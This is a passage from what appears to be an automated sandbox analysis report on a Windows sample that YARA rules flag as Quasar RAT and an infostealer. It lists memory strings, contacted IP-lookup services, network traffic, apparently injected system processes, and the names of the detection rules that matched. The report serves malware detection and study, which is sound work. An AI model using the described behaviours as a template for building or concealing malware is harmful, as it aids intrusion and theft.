e=T.createElement("form");e.classList.add(GSe,"margin-top-xxs"),e.setAttribute(Lo.name,GSe),e.action="javascript:",e.addEventListener("submit",l=>l.preventDefault());let t=T.createElement("label"),o=T.createElement("span");o.classList.add("visually-hidden"),o.textContent=xo,t.appendChild(o),e.appendChild(t);let n=T.createElement("input");n.type="search",n.classList.add("input","input-lg","padding-right-sm"),n.value=Gf(),n.placeholder=xo,t.appendChild(n);let r=T.createElement("a");r.href="#",r.title=g9,r.classList.add("clear"),r.addEventListener("click",l=>{l.preventDefault(),n.value="",n.dispatchEvent(ne
Source: chromecache_136.9.dr	String found in binary or memory: </div>`}function jGe(e){return e.authenticationModes?e.authenticationModes.map(t=>t.type).includes("MSA"):!1}function QGe(e){let t=e.authenticationModes.find(o=>o.type==="MSA");return t?t.upn:null}function WGe(e){let t=e.authenticationModes.find(o=>o.type==="AAD");return t?t.upn:null}function KGe(e,t,o){return t??(Xt(e.email)?o:e.email)??""}function Zwe(e){let t=jGe(e),o=t?QGe(e):null,n=t?null:WGe(e),r=KGe(e,o,n);return[t,r]}function JGe(e,t){let[o,n]=Zwe(t);if(o){let i=e.querySelector("#report-msa-email-account");i.innerText=n}let r=e.querySelector("#opt-into-email-checkbox"),s=e.querySelector("#submitter-info");r.addEventListener("change",()=>{r.checked?s.hidden=!1:s.hidden=!0})}function XGe(e){if(!e)return;let t=e.querySelector("#select-reason"),o=e.querySelector("#other-reason-textarea-container"),n=o.querySelector("textarea");!t\|\|!o\|\|!n\|\|(t.value==="Other"&&(o.hidden=!1,n.required=!0),t.addEventListener("change",()=>{t.value==="Other"\|\|t.value==="14"?(o.hidden=!1,n.required=!0,n.disabled=!1):(o.hidden=!0,n.required=!1,n.disabled=!0)}))}var uo;function eEe(){let e=document.getElementById("share-to-linkedin-profile");e&&e.addEventListener("click",t=>{let o=t.currentTarget,n=JSON.parse(o.dataset.credential),r=document.createElement("div"),s=ZGe(n);v(s,r),uo=new pe(r),uo.show();let i=document.getElementById("share-to-feed-button"),a=document.getElementById("linkedin-feed-message"),l=new URL(decodeURI(i.getAttribute("href")));a.onchange=()=>{l.searchParams.set("text",a.value),i.setAttribute("href",l.toString())}})}function ZGe(e){let t=encodeURI(`https://${location.host}/api/credentials/share/${h.data.userLocale}/${S.userName}/${e?.credentialId}?sharingId=${S.sharingId}`),o=1035,n=i=>new Date(i).getFullYear(),r=i=>new Date(i).getMonth()+1,s=encodeURI(`https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=${e.title}&organizationId=${o}&issueYear=${n(e.awardedOn)}&issueMonth=${r(e.awardedOn)}&expirationYear=${e.expiresOn?n(e.expiresOn):""}&expirationMonth=${e.expiresOn?r(e.expiresOn):""}&certUrl=${t}&certId=${e.credentialId}&skills=${e.skills?`${e.skills.map(i=>encodeURIComponent(i)).join(",")}`:""}`);return d` equals www.linkedin.com (Linkedin)

Source: unknown

DNS traffic detected: queries for: www.google.com

Source: unknown

HTTP traffic detected: POST /rest/v1/delivery?client=microsoftmscompoc&sessionId=fa5c231aaf8548e19d78d3d55f8a49a5&version=2.9.0 HTTP/1.1Host: target.microsoft.comConnection: keep-aliveContent-Length: 1051sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plainAccept: */*Origin: https://learn.microsoft.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MSCC=NR; at_check=true; mbox=session#fa5c231aaf8548e19d78d3d55f8a49a5#1713908004

Source: svchost.exe, 00000008.00000002.3310972425.000001E435800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: ilasm.exe, 00000019.00000002.3309009758.0000000005CDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: ilasm.exe, 00000019.00000002.3309009758.0000000005CDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000008.00000002.3309868459.000001E430B02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2804233313.000001E435602000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3311267298.000001E435862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/an2dmhqv5igncgwzelkqyugk5q_2024.4.19.0/go
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000008.00000002.3311410260.000001E4358C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: svchost.exe, 00000008.00000002.3311079208.000001E43582F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/an2dmhqv5igncgwzelkqyugk5q_2024.4.19.0
Source: qmgr.db.8.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: ilasm.exe, 00000019.00000002.3309899452.0000000007E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipwho.is
Source: ilasm.exe, 00000019.00000002.3309899452.0000000007E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipwho.isd
Source: chromecache_146.9.dr	String found in binary or memory: http://schema.org/Organization
Source: ilasm.exe, 00000019.00000002.3309899452.0000000007E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: ilasm.exe, 00000019.00000002.3309899452.0000000007E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/d
Source: svchost.exe, 00000008.00000002.3311162257.000001E435859000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microst.
Source: KxgGGaiW3E.exe, 00000000.00000000.2054022360.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B694BC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEE4E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000000.2257574944.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000000.2339412679.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599121000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2441256177.00007FF703303000.00000008.00000001.01000000.00000008.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: KxgGGaiW3E.exe, 00000000.00000000.2054022360.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B694BC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEE4E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000000.2257574944.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000000.2339412679.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599121000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2441256177.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, ilasm.exe, 00000019.00000002.3309899452.0000000007BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chromecache_145.9.dr	String found in binary or memory: http://www.gimp.org/xmp/
Source: chromecache_146.9.dr	String found in binary or memory: https://aka.ms/ContentUserFeedback
Source: chromecache_136.9.dr	String found in binary or memory: https://aka.ms/banner_mslearn_tier1?wt.mc_id=build24_t1_learnpromotion_events
Source: chromecache_136.9.dr	String found in binary or memory: https://aka.ms/certhelp
Source: KxgGGaiW3E.exe, 00000000.00000000.2054022360.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B694BC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEE4E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000000.2257574944.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000000.2339412679.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599121000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2441256177.00007FF703303000.00000008.00000001.01000000.00000008.sdmp	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: chromecache_146.9.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_136.9.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_146.9.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, ngen.exe, 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: chromecache_146.9.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_146.9.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_136.9.dr	String found in binary or memory: https://channel9.msdn.com/
Source: svchost.exe, 00000008.00000003.2187011411.000001E435673000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.2187011411.000001E435600000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: chromecache_136.9.dr	String found in binary or memory: https://github.com/$
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/dotnet/docs/issues
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_136.9.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_146.9.dr	String found in binary or memory: https://github.com/nschonni
Source: ilasm.exe, 00000019.00000002.3309899452.0000000007E07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is
Source: KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, ngen.exe, 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, ilasm.exe, 00000019.00000002.3309899452.0000000007E07000.00000004.00000800.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is/
Source: chromecache_146.9.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js
Source: chromecache_136.9.dr	String found in binary or memory: https://learn-video.azurefd.net/
Source: chromecache_136.9.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_136.9.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0
Source: chromecache_136.9.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: chromecache_136.9.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: qmgr.db.8.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, ngen.exe, 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, ngen.exe, 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, ilasm.exe, 00000019.00000002.3309899452.0000000007C57000.00000004.00000800.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, ngen.exe, 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
Source: chromecache_136.9.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_136.9.dr	String found in binary or memory: https://www.cafbaseline.com/
Source: chromecache_136.9.dr	String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: chromecache_136.9.dr	String found in binary or memory: https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=$

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.204.213.5:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49824 version: TLS 1.2

E-Banking Fraud

Yara detected Quasar RAT

Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.20599dba870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.3309899452.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2488394877.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184893054.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3307610797.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 6612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ngen.exe PID: 4204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 7424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 2428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ilasm.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wmplayer.exe PID: 4408, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
